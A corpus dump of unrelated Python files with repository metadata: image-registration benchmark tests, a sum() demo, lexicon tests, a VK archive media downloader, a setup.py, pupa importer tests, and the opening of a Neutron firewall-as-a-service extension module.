1bef7a1aa389a58d40ce648d1ed75a0579e889d3 | 8,752 | py | Python | tests/test_benchmark.py | fossabot/BIRL | 62e91523ac5797a13a7b78b9869ccfdf61cc60d8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_benchmark.py | fossabot/BIRL | 62e91523ac5797a13a7b78b9869ccfdf61cc60d8 | [
"BSD-3-Clause"
] | null | null | null | tests/test_benchmark.py | fossabot/BIRL | 62e91523ac5797a13a7b78b9869ccfdf61cc60d8 | [
"BSD-3-Clause"
] | null | null | null | """
Testing default benchmarks in single-thread and parallel configurations
Check whether it generates correct outputs and resulting values
Copyright (C) 2017-2019 Jiri Borovec <jiri.borovec@fel.cvut.cz>
"""
import argparse
import logging
import os
import shutil
import sys
import unittest
try: # python 3
from unittest.mock import patch
except ImportError: # python 2
from mock import patch
import numpy as np
import pandas as pd
from numpy.testing import assert_raises, assert_array_almost_equal
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
from birl.utilities.data_io import update_path, save_config_yaml
from birl.utilities.dataset import args_expand_parse_images
from birl.utilities.experiments import parse_arg_params, try_decorator
from birl.benchmark import ImRegBenchmark
from birl.bm_template import BmTemplate
PATH_ROOT = os.path.dirname(update_path('birl'))
PATH_DATA = update_path('data-images')
PATH_CSV_COVER_MIX = os.path.join(PATH_DATA, 'pairs-imgs-lnds_mix.csv')
PATH_CSV_COVER_ANHIR = os.path.join(PATH_DATA, 'pairs-imgs-lnds_histol.csv')
# logging.basicConfig(level=logging.INFO)
class TestBmRegistration(unittest.TestCase):
@classmethod
def setUpClass(cls):
logging.basicConfig(level=logging.INFO)
cls.path_out = os.path.join(PATH_ROOT, 'output-testing')
shutil.rmtree(cls.path_out, ignore_errors=True)
os.mkdir(cls.path_out)
def _remove_default_experiment(self, bm_name):
path_expt = os.path.join(self.path_out, bm_name)
shutil.rmtree(path_expt, ignore_errors=True)
@classmethod
def test_benchmark_invalid_inputs(self):
# test missing some parameters
params = {
'path_table': 'x',
'path_out': 'x',
'nb_workers': 0,
'unique': False,
}
# try a missing params
for miss in ['path_table', 'path_out', 'unique']:
params_miss = params.copy()
del params_miss[miss]
assert_raises(AssertionError, ImRegBenchmark, params_miss)
# not defined output folder
assert_raises(Exception, ImRegBenchmark, params)
def test_benchmark_failing(self):
""" test run in parallel with failing experiment """
params = {
'path_table': PATH_CSV_COVER_MIX,
'path_dataset': PATH_DATA,
'path_out': self.path_out,
'preprocessing': 'nothing',
'nb_workers': 4,
'visual': True,
'unique': True,
}
benchmark = ImRegBenchmark(params)
benchmark.run()
# no landmarks were copied and no experiment results were produced
list_csv = [
len([csv for csv in files if os.path.splitext(csv)[-1] == '.csv'])
for _, _, files in os.walk(benchmark.params['path_exp'])
]
self.assertEqual(sum(list_csv), 0)
del benchmark
def test_benchmark_parallel(self):
""" test run in parallel (2 threads) """
self._remove_default_experiment(ImRegBenchmark.__name__)
params = {
'path_table': PATH_CSV_COVER_MIX,
'path_out': self.path_out,
'preprocessing': ['gray', 'matching-rgb'],
'nb_workers': 2,
'visual': True,
'unique': False,
}
benchmark = ImRegBenchmark(params)
# run it for the first time, complete experiment
benchmark.run()
# rerun the experiment to simulate repeating an unfinished benchmark
benchmark.run()
self.check_benchmark_results(benchmark, final_means=[0., 0., 0., 0., 0.], final_stds=[0., 0., 0., 0., 0.])
del benchmark
def test_benchmark_simple(self):
""" test run in sequence (1 thread) """
self._remove_default_experiment(ImRegBenchmark.__name__)
params = {
'path_table': PATH_CSV_COVER_ANHIR,
'path_dataset': PATH_DATA,
'path_out': self.path_out,
'preprocessing': ['matching-hsv', 'gray'],
'nb_workers': 1,
'visual': True,
'unique': False,
}
benchmark = ImRegBenchmark(params)
benchmark.run()
self.check_benchmark_results(benchmark, final_means=[0., 0.], final_stds=[0., 0.])
del benchmark
def test_benchmark_template(self):
""" test run in single thread """
path_config = os.path.join(self.path_out, 'sample_config.yaml')
save_config_yaml(path_config, {})
params = {
'path_table': PATH_CSV_COVER_MIX,
'path_out': self.path_out,
'path_config': path_config,
'nb_workers': 2,
'unique': False,
'visual': True,
}
benchmark = BmTemplate(params)
benchmark.run()
self.check_benchmark_results(
benchmark, final_means=[28., 68., 73., 76., 95.], final_stds=[1., 13., 28., 28., 34.]
)
os.remove(path_config)
del benchmark
def check_benchmark_results(self, benchmark, final_means, final_stds):
""" check whether the benchmark folder contains all required files
and compute statistic correctly """
bm_name = benchmark.__class__.__name__
path_bm = os.path.join(self.path_out, bm_name)
self.assertTrue(os.path.exists(path_bm), msg='Missing benchmark: %s' % bm_name)
# required output files
for file_name in [
benchmark.NAME_CSV_REGISTRATION_PAIRS, benchmark.NAME_RESULTS_CSV, benchmark.NAME_RESULTS_TXT
]:
self.assertTrue(
os.path.isfile(os.path.join(path_bm, file_name)),
msg='Missing "%s" file in the BM experiment' % file_name
)
# load registration file
path_csv = os.path.join(path_bm, benchmark.NAME_CSV_REGISTRATION_PAIRS)
df_regist = pd.read_csv(path_csv, index_col=0)
# the registration table should contain one record per image pair in the overview
self.assertEqual(
len(df_regist),
len(benchmark._df_overview),
msg='Found only %i records instead of %i' % (len(df_regist), len(benchmark._df_overview))
)
# test presence of particular columns
for col in list(benchmark.COVER_COLUMNS) + [benchmark.COL_IMAGE_MOVE_WARP]:
self.assertIn(col, df_regist.columns, msg='Missing column "%s" in result table' % col)
cols_lnds_warp = [
col in df_regist.columns for col in [benchmark.COL_POINTS_REF_WARP, benchmark.COL_POINTS_MOVE_WARP]
]
self.assertTrue(any(cols_lnds_warp), msg='Missing any column of warped landmarks')
col_lnds_warp = benchmark.COL_POINTS_REF_WARP if cols_lnds_warp[0] \
else benchmark.COL_POINTS_MOVE_WARP
# check existence of all mentioned files
for _, row in df_regist.iterrows():
self.assertTrue(
os.path.isfile(os.path.join(path_bm, row[benchmark.COL_IMAGE_MOVE_WARP])),
msg='Missing image "%s"' % row[benchmark.COL_IMAGE_MOVE_WARP]
)
self.assertTrue(
os.path.isfile(os.path.join(path_bm, row[col_lnds_warp])),
msg='Missing landmarks "%s"' % row[col_lnds_warp]
)
# check existence of statistical results
for stat_name in ['Mean', 'STD', 'Median', 'Min', 'Max']:
self.assertTrue(
any(stat_name in col for col in df_regist.columns), msg='Missing statistics "%s"' % stat_name
)
# test specific results
assert_array_almost_equal(sorted(df_regist['TRE Mean'].values), np.array(final_means), decimal=0)
assert_array_almost_equal(sorted(df_regist['TRE STD'].values), np.array(final_stds), decimal=0)
def test_try_wrap(self):
self.assertIsNone(try_wrap())
def test_argparse(self):
with patch('argparse._sys.argv', ['script.py']):
args = parse_arg_params(argparse.ArgumentParser())
self.assertIsInstance(args, dict)
def test_argparse_images(self):
with patch('argparse._sys.argv', ['script.py', '-i', 'an_image.png']):
args = args_expand_parse_images(argparse.ArgumentParser())
self.assertIsInstance(args, dict)
def test_fail_visual(self):
fig = ImRegBenchmark._visual_image_move_warp_lnds_move_warp({ImRegBenchmark.COL_POINTS_MOVE_WARP: 'abc'})
self.assertIsNone(fig)
fig = ImRegBenchmark._visual_image_move_warp_lnds_ref_warp({ImRegBenchmark.COL_POINTS_REF_WARP: 'abc'})
self.assertIsNone(fig)
fig = ImRegBenchmark.visualise_registration((0, {}))
self.assertIsNone(fig)
@try_decorator
def try_wrap():
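# '%i' % '42' raises a TypeError; try_decorator is expected to swallow the
# exception and return None (asserted in test_try_wrap above)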
return '%i' % '42'
| 38.725664 | 114 | 0.63654 | 1,077 | 8,752 | 4.91922 | 0.241411 | 0.020385 | 0.018875 | 0.018498 | 0.375047 | 0.297282 | 0.265761 | 0.196112 | 0.118724 | 0.118724 | 0 | 0.00907 | 0.256741 | 8,752 | 225 | 115 | 38.897778 | 0.80538 | 0.110946 | 0 | 0.283237 | 1 | 0 | 0.101827 | 0.006348 | 0 | 0 | 0 | 0 | 0.115607 | 1 | 0.075145 | false | 0 | 0.098266 | 0.00578 | 0.184971 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1bf2d4c209e500db17a5c6d33e7442b5b858b75b | 343 | py | Python | sum.py | PraghadeshManivannan/Built-in-Functions-Python | a3120641e03e7be8e1408dd467997ad6fdf04d87 | [
"MIT"
] | null | null | null | sum.py | PraghadeshManivannan/Built-in-Functions-Python | a3120641e03e7be8e1408dd467997ad6fdf04d87 | [
"MIT"
] | null | null | null | sum.py | PraghadeshManivannan/Built-in-Functions-Python | a3120641e03e7be8e1408dd467997ad6fdf04d87 | [
"MIT"
] | null | null | null |
#sum(iterable, start=0, /)
#Return the sum of a 'start' value (default: 0) plus an iterable of numbers
#When the iterable is empty, return the start value.
'''This function is intended specifically for use with numeric values and may
reject non-numeric types.'''
a = [1,3,5,7,9,4,6,2,8]
print(sum(a))
print(sum(a,start = 4))
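# Two more illustrative calls covering the documented empty-iterable behavior:
print(sum([]))      # empty iterable -> returns the default start value, 0
print(sum([], 10))  # empty iterable with start=10 -> returns 10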
| 24.5 | 78 | 0.676385 | 61 | 343 | 3.803279 | 0.655738 | 0.077586 | 0.077586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043321 | 0.19242 | 343 | 13 | 79 | 26.384615 | 0.794224 | 0.731778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
1bf74b762d2902af1c8ee402ce83c52345c29025 | 5,266 | py | Python | tests/commonsense/semantic_lexicon_knowledge/ai2_lexicon_test.py | keisks/propara | 49fa8fe0481291df18b2c7b48e7ba1dafaad48e2 | [
"Apache-2.0"
] | 84 | 2018-06-02T02:00:53.000Z | 2022-03-13T12:17:42.000Z | tests/commonsense/semantic_lexicon_knowledge/ai2_lexicon_test.py | keisks/propara | 49fa8fe0481291df18b2c7b48e7ba1dafaad48e2 | [
"Apache-2.0"
] | 3 | 2018-10-31T00:28:31.000Z | 2020-05-12T01:06:53.000Z | tests/commonsense/semantic_lexicon_knowledge/ai2_lexicon_test.py | keisks/propara | 49fa8fe0481291df18b2c7b48e7ba1dafaad48e2 | [
"Apache-2.0"
] | 13 | 2018-09-14T20:37:51.000Z | 2021-03-23T09:24:49.000Z | from unittest import TestCase
from propara.commonsense.semantic_lexicon_knowledge.ai2_lexicon import AI2Lexicon, AI2LexiconPredicate, AI2LexiconArg, AI2LexiconIndications, \
AI2LexiconPattern
class TestAI2Lexicon(TestCase):
def setUp(self):
self.lexicon_fp = "tests/fixtures/ie/TheSemanticLexicon-v3.0_withadj.tsv"
def testLoads(self):
self.lexicon = AI2Lexicon(self.lexicon_fp)
# print(f"evaporate.subj: {self.lexicon.what_happens_to_subj('evaporate', has_agent=True, has_patient=False)}")
# print(f"evaporate.obj: {self.lexicon.what_happens_to_obj('evaporate', has_agent=True, has_patient=False)}")
#
# print(f"evaporate.subj: {self.lexicon.what_happens_to_subj('evaporate')}")
# print(f"evaporate.obj: {self.lexicon.what_happens_to_obj('evaporate')}")
# v2 doesn't contain size, temperature, phase attributes
# infile = "tests/fixtures/ie/ai2-lexicon-v2.tsv"
# the following path is useful when debugging from the browser.
# self.lexicon = AI2Lexicon("tests/fixtures/ie/TheSemanticLexicon-v3.0_withadj.tsv")
assert self.lexicon._after_subj(("blend in", AI2LexiconPattern.SO)) == {
AI2LexiconPredicate.IS_AT: AI2LexiconArg.OBJECT,
AI2LexiconPredicate.NOT_IS_AT: AI2LexiconArg.PREP_SRC,
}
assert self.lexicon._after_obj(("absorb", AI2LexiconPattern.SO))[
AI2LexiconPredicate.IS_AT] == AI2LexiconArg.SUBJECT
# assert self.lexicon._after_obj(("absorbs", AI2LexiconPattern.SO)).get(AI2LexiconPredicate.IS_AT, "") == AI2LexiconArg.SUBJECT
assert len(self.lexicon._after_obj(("blend in", AI2LexiconPattern.SO))) == 0
assert len(self.lexicon._after_obj(("blend blend2", AI2LexiconPattern.SO))) == 0
assert AI2LexiconIndications.MOVED not in self.lexicon.what_happens_to_subj("absorbs")
assert AI2LexiconIndications.MOVED in self.lexicon.what_happens_to_obj("absorbs")
assert AI2LexiconIndications.CREATED in self.lexicon.what_happens_to_obj("sprout")
assert AI2LexiconIndications.CREATED in self.lexicon.what_happens_to_subj("sprout", has_agent=True,
has_patient=False)
assert AI2LexiconIndications.DESTROYED not in self.lexicon.what_happens_to_subj("sprout")
assert AI2LexiconIndications.DESTROYED not in self.lexicon.what_happens_to_obj("sprout")
assert AI2LexiconIndications.TEMPERATURE_INC not in self.lexicon.what_happens_to_obj("turn")
assert AI2LexiconIndications.TEMPERATURE_INC in self.lexicon.what_happens_to_subj("gets hot")
assert AI2LexiconIndications.SIZE_INC in self.lexicon.what_happens_to_subj("gets bigger")
assert AI2LexiconIndications.SIZE_INC in self.lexicon.what_happens_to_subj("become bigger")
assert AI2LexiconIndications.SIZE_INC in self.lexicon.what_happens_to_subj("turned bigger")
assert AI2LexiconIndications.SIZE_INC not in self.lexicon.what_happens_to_obj("turns into bigger")
assert AI2LexiconIndications.MOVED not in self.lexicon.what_happens_to_subj("turned")
assert AI2LexiconIndications.PHASE_UNK_GAS in self.lexicon.what_happens_to_subj("turned gaseous")
assert AI2LexiconIndications.PHASE_LIQUID_SOLID in self.lexicon.what_happens_to_subj("solidify", has_agent=True,
has_patient=False)
assert AI2LexiconIndications.PHASE_LIQUID_SOLID in self.lexicon.what_happens_to_obj("solidify", has_agent=True,
has_patient=True)
assert AI2LexiconIndications.PHASE_UNK_SOLID not in self.lexicon.what_happens_to_subj("solidifies")
assert AI2LexiconIndications.PHASE_SOLID_GAS in self.lexicon.what_happens_to_subj("sublime", has_agent=True,
has_patient=False)
assert AI2LexiconIndications.PHASE_SOLID_GAS in self.lexicon.what_happens_to_obj("sublime", has_agent=True,
has_patient=True)
# If both agent and patient are present, or only one, the difference is
# whether the object is given; verbs that can be both transitive and
# intransitive therefore have two entries.
#
# A big rock stops the stream of water from uphill => stream of water moved from uphill to rock
# car stops at the intersection ==> car moved to intersection
# we have removed lots of fine details in the patterns (VerbNet had much more info there)
def test_type_of_pattern(self):
input = "SUBJECT VERB OBJECT PREP-SRC PREP-DEST"
assert AI2Lexicon.type_of_pattern(input) == AI2LexiconPattern.SO
input = "SUBJECT VERB OBJECT"
assert AI2Lexicon.type_of_pattern(input) == AI2LexiconPattern.SO
input = "SUBJECT VERB PREP-SRC PREP-DEST"
assert AI2Lexicon.type_of_pattern(input) == AI2LexiconPattern.S
| 71.162162 | 143 | 0.681732 | 614 | 5,266 | 5.630293 | 0.245928 | 0.101822 | 0.099798 | 0.14637 | 0.663581 | 0.64015 | 0.568412 | 0.538039 | 0.472375 | 0.405265 | 0 | 0.014955 | 0.238131 | 5,266 | 73 | 144 | 72.136986 | 0.84671 | 0.230915 | 0 | 0.148936 | 0 | 0 | 0.084119 | 0.013151 | 0 | 0 | 0 | 0 | 0.553191 | 1 | 0.06383 | false | 0 | 0.042553 | 0 | 0.12766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4007ccb371063c993bd22bb2370d18838e357a3f | 3,218 | py | Python | extractor/util.py | bcskda/vk-archive-deepercopy | 3619b94eb3e0f5f67860022cdfb2074e457c0cd2 | [
"Unlicense"
] | 1 | 2020-04-24T09:24:31.000Z | 2020-04-24T09:24:31.000Z | extractor/util.py | bcskda/vk-archive-deepercopy | 3619b94eb3e0f5f67860022cdfb2074e457c0cd2 | [
"Unlicense"
] | null | null | null | extractor/util.py | bcskda/vk-archive-deepercopy | 3619b94eb3e0f5f67860022cdfb2074e457c0cd2 | [
"Unlicense"
] | null | null | null | import functools
import glob
import itertools
import logging
import os
from progressbar import progressbar
import re
import requests
from typing import List
class ValueSingleDispatch:
def __init__(self):
self._handlers = dict()
def register(self, key):
def decorator(fn: callable):
if key in self._handlers:
raise KeyError(key)
self._handlers[key] = fn
return fn
return decorator
def call(self, key, *args, **kwargs):
if key not in self._handlers:
raise KeyError(key)
return self._handlers[key](*args, **kwargs)
def valid_keys(self):
return self._handlers.keys()
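# Usage sketch (the key and handler name are hypothetical, for illustration only):
#   dispatch = ValueSingleDispatch()
#
#   @dispatch.register('photo')
#   def handle_photo(url):
#       ...
#
#   dispatch.call('photo', 'https://example.com/1.jpg')  # runs handle_photo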
def alphanumeric_glob(pattern: str):
"""Glob and sort alpahnumerically. Limitations: exactly one `*', no `?', file names with single extention."""
matches = glob.glob(pattern)
asterisk_pos = pattern.find('*')
matches.sort(key=lambda name: int(name[asterisk_pos:name.rfind('.')]))
return matches
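# Illustration (hypothetical file names): given msg1.html, msg2.html and msg10.html,
# alphanumeric_glob('msg*.html') returns them in numeric order
# ['msg1.html', 'msg2.html', 'msg10.html'], while a plain lexicographic sort
# would give ['msg1.html', 'msg10.html', 'msg2.html'].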
def findall_in_files(pattern: re.Pattern, filenames: List[str], encoding: str) -> re.Match:
"""Generator"""
for filename in filenames:
logging.debug('util.findall_in_files: input file %s', filename)
with open(filename, 'rb') as ifile:
for match in pattern.findall(ifile.read().decode(encoding)):
logging.debug('util.findall_in_files(): match: file = %s, text = %s', filename, match)
yield match
def make_pattern(url_regex: str, extentions: List[str]) -> re.Pattern:
if extentions:
ext_regex = '({})'.format('|'.join(extentions))
else:
ext_regex = '()'
return re.compile(url_regex.format(extentions=ext_regex))
def download_by_pattern(url_regex: str, filenames: List[str], output_dir: str, *, extentions=[], encoding='windows-1251', limit=None):
logging.debug('util.download_by_pattern(): pattern = %s, extentions = %s', url_regex, extentions)
pattern = make_pattern(url_regex, extentions)
matches = findall_in_files(pattern, filenames, encoding)
if limit is not None:
matches = itertools.islice(matches, limit)
matches = list(matches)
logging.info('util.download_by_pattern(): %d matches', len(matches))
os.makedirs(output_dir, exist_ok=True)
downloads = 0
# TODO statistics by extension
for idx, (url, ext) in progressbar(enumerate(matches), max_value=len(matches)):
local_name = '{:07d}'.format(idx) + '_' + os.path.basename(url)
try:
download(url, os.path.join(output_dir, local_name))
downloads += 1
except Exception as e:
logging.warning('util.download_by_pattern(): unhandled exception: url = %s, e = %s', url, e)
logging.info('util.download_by_pattern(): %d successful downloads', downloads)
if downloads < len(matches):
logging.warning('util.download_by_pattern(): %d downloads failed, see log for warnings', len(matches) - downloads)
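# Usage sketch (regex and paths are hypothetical; the URL group is required and
# `{extentions}` is expanded to an alternation group by make_pattern above):
#   download_by_pattern(r'(https?://\S+?\.{extentions})', ['dump/page1.html'],
#                       'downloads', extentions=['jpg', 'png'], limit=50)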
def download(url: str, local_path: str) -> bool:
logging.debug('util.download(): url = %s, local = %s', url, local_path)
req = requests.get(url)
with open(local_path, 'wb') as ofile:
ofile.write(req.content)
| 38.771084 | 134 | 0.657551 | 408 | 3,218 | 5.04902 | 0.330882 | 0.034951 | 0.049515 | 0.050971 | 0.124757 | 0.124272 | 0.032039 | 0 | 0 | 0 | 0 | 0.003168 | 0.215351 | 3,218 | 82 | 135 | 39.243902 | 0.812673 | 0.044438 | 0 | 0.029412 | 0 | 0 | 0.142624 | 0.059073 | 0 | 0 | 0 | 0.012195 | 0 | 1 | 0.147059 | false | 0 | 0.132353 | 0.014706 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
400afc4da001a8c030925a65e03f44b9ed050772 | 1,637 | py | Python | setup.py | gillins/pyshepseg | bfa8d157d610bf4f581a2500d0afb42d4f92d59b | [
"MIT"
] | 5 | 2021-02-03T05:02:56.000Z | 2022-01-31T07:55:20.000Z | setup.py | gillins/pyshepseg | bfa8d157d610bf4f581a2500d0afb42d4f92d59b | [
"MIT"
] | 14 | 2021-02-03T04:18:48.000Z | 2022-01-24T03:50:22.000Z | setup.py | gillins/pyshepseg | bfa8d157d610bf4f581a2500d0afb42d4f92d59b | [
"MIT"
] | 13 | 2021-02-03T03:41:17.000Z | 2022-01-24T04:21:23.000Z | #Copyright 2021 Neil Flood and Sam Gillingham. All rights reserved.
#
#Permission is hereby granted, free of charge, to any person
#obtaining a copy of this software and associated documentation
#files (the "Software"), to deal in the Software without restriction,
#including without limitation the rights to use, copy, modify,
#merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
#OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
#ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
#CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
#WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from numpy.distutils.core import setup
import pyshepseg
setup(name='pyshepseg',
version=pyshepseg.SHEPSEG_VERSION,
description='Python implementation of the image segmentation algorithm described by Shepherd et al',
author='Neil Flood and Sam Gillingham',
scripts=['bin/test_pyshepseg.py', 'bin/test_pyshepseg_tiling.py',
'bin/test_pyshepseg_subset.py'],
packages=['pyshepseg'],
license='LICENSE.txt',
url='https://github.com/ubarsc/pyshepseg'
)
| 46.771429 | 106 | 0.756261 | 233 | 1,637 | 5.287554 | 0.566524 | 0.071429 | 0.038961 | 0.024351 | 0.040584 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002963 | 0.175321 | 1,637 | 34 | 107 | 48.147059 | 0.90963 | 0.662187 | 0 | 0 | 0 | 0 | 0.478424 | 0.144465 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
401988f94a7b7ebda02b1f821bbce411385f8136 | 3,885 | py | Python | pupa/tests/importers/test_base_importer.py | influence-usa/pupa | 5105c39a535ad401f7babe4eecb3861bed1f8326 | [
"BSD-3-Clause"
] | null | null | null | pupa/tests/importers/test_base_importer.py | influence-usa/pupa | 5105c39a535ad401f7babe4eecb3861bed1f8326 | [
"BSD-3-Clause"
] | 3 | 2015-06-09T19:22:50.000Z | 2015-06-09T21:41:22.000Z | pupa/tests/importers/test_base_importer.py | influence-usa/pupa | 5105c39a535ad401f7babe4eecb3861bed1f8326 | [
"BSD-3-Clause"
] | null | null | null | import os
import json
import shutil
import tempfile
import mock
import pytest
from opencivicdata.models import Person
from pupa.scrape import Person as ScrapePerson
from pupa.scrape import Organization as ScrapeOrganization
from pupa.importers.base import omnihash, BaseImporter
from pupa.importers import PersonImporter, OrganizationImporter
from pupa.exceptions import UnresolvedIdError, DataImportError
class FakeImporter(BaseImporter):
_type = 'test'
def test_omnihash_python_types():
# string
assert omnihash('test') == omnihash('test')
# list
assert omnihash(['this', 'is', 'a', 'list']) == omnihash(['this', 'is', 'a', 'list'])
# set
assert omnihash({'and', 'a', 'set'}) == omnihash({'set', 'set', 'and', 'a'})
# dict w/ set and tuple as well
assert (omnihash({'a': {('fancy', 'nested'): {'dict'}}}) ==
omnihash({'a': {('fancy', 'nested'): {'dict'}}}))
def test_import_directory():
# write out some temp data to filesystem
datadir = tempfile.mkdtemp()
dicta = {'test': 'A'}
dictb = {'test': 'B'}
open(os.path.join(datadir, 'test_a.json'), 'w').write(json.dumps(dicta))
open(os.path.join(datadir, 'test_b.json'), 'w').write(json.dumps(dictb))
# simply ensure that import directory calls import_data with all dicts
ti = FakeImporter('jurisdiction-id')
with mock.patch.object(ti, attribute='import_data') as mockobj:
ti.import_directory(datadir)
# import_data should be called once
assert mockobj.call_count == 1
# kind of hacky, get the total list of args passed in
arg_objs = list(mockobj.call_args[0][0])
# 2 args only, make sure a and b are in there
assert len(arg_objs) == 2
assert dicta in arg_objs
assert dictb in arg_objs
# clean up datadir
shutil.rmtree(datadir)
# doing these next few tests just on a Person because the same code handles all types
# but for completeness maybe it would be better to run these on each type?
@pytest.mark.django_db
def test_deduplication_identical_object():
p1 = ScrapePerson('Dwayne').as_dict()
p2 = ScrapePerson('Dwayne').as_dict()
PersonImporter('jid').import_data([p1, p2])
assert Person.objects.count() == 1
@pytest.mark.django_db
def test_exception_on_identical_objects_in_import_stream():
# these two objects aren't identical, but refer to the same thing
# at the moment we consider this an error (but there may be a better way to handle this?)
o1 = ScrapeOrganization('X-Men', classification='unknown').as_dict()
o2 = ScrapeOrganization('X-Men', founding_date='1970', classification='unknown').as_dict()
with pytest.raises(Exception):
OrganizationImporter('jid').import_data([o1, o2])
@pytest.mark.django_db
def test_resolve_json_id():
p1 = ScrapePerson('Dwayne').as_dict()
p2 = ScrapePerson('Dwayne').as_dict()
pi = PersonImporter('jid')
# do import and get database id
p1_id = p1['_id']
p2_id = p2['_id']
pi.import_data([p1, p2])
db_id = Person.objects.get().id
# simplest case
assert pi.resolve_json_id(p1_id) == db_id
# duplicate should resolve to same id
assert pi.resolve_json_id(p2_id) == db_id
# a null id should map to None
assert pi.resolve_json_id(None) is None
# no such id
with pytest.raises(UnresolvedIdError):
pi.resolve_json_id('this-is-invalid')
@pytest.mark.django_db
def test_invalid_fields():
p1 = ScrapePerson('Dwayne').as_dict()
p1['newfield'] = "shouldn't happen"
with pytest.raises(DataImportError):
PersonImporter('jid').import_data([p1])
@pytest.mark.django_db
def test_invalid_fields_related_item():
p1 = ScrapePerson('Dwayne')
p1.add_link('http://example.com')
p1 = p1.as_dict()
p1['links'][0]['test'] = 3
with pytest.raises(DataImportError):
PersonImporter('jid').import_data([p1])
| 31.585366 | 94 | 0.686486 | 543 | 3,885 | 4.775322 | 0.344383 | 0.030852 | 0.030852 | 0.034709 | 0.257231 | 0.163903 | 0.115696 | 0.115696 | 0.086386 | 0.040108 | 0 | 0.012295 | 0.183526 | 3,885 | 122 | 95 | 31.844262 | 0.80517 | 0.186873 | 0 | 0.186667 | 0 | 0 | 0.09366 | 0 | 0 | 0 | 0 | 0 | 0.16 | 1 | 0.093333 | false | 0 | 0.346667 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
401fd2803f10b2fab1010a7dfe0776cbe8cc8571 | 11,612 | py | Python | neutron_fwaas/extensions/firewall_v2.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/extensions/firewall_v2.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/extensions/firewall_v2.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from debtcollector import moves
from neutron.api.v2 import resource_helper
from neutron_lib.api.definitions import constants as api_const
from neutron_lib.api.definitions import firewall_v2
from neutron_lib.api import extensions
from neutron_lib.exceptions import firewall_v2 as f_exc
from neutron_lib.services import base as service_base
from oslo_config import cfg
import six
from neutron_fwaas._i18n import _
from neutron_fwaas.common import fwaas_constants
FirewallGroupNotFound = moves.moved_class(
f_exc.FirewallGroupNotFound, 'FirewallGroupNotFound', __name__)
FirewallGroupInUse = moves.moved_class(
f_exc.FirewallGroupInUse, 'FirewallGroupInUse', __name__)
FirewallGroupInPendingState = moves.moved_class(
f_exc.FirewallGroupInPendingState, 'FirewallGroupInPendingState', __name__)
FirewallGroupPortInvalid = moves.moved_class(
f_exc.FirewallGroupPortInvalid, 'FirewallGroupPortInvalid', __name__)
FirewallGroupPortInvalidProject = moves.moved_class(
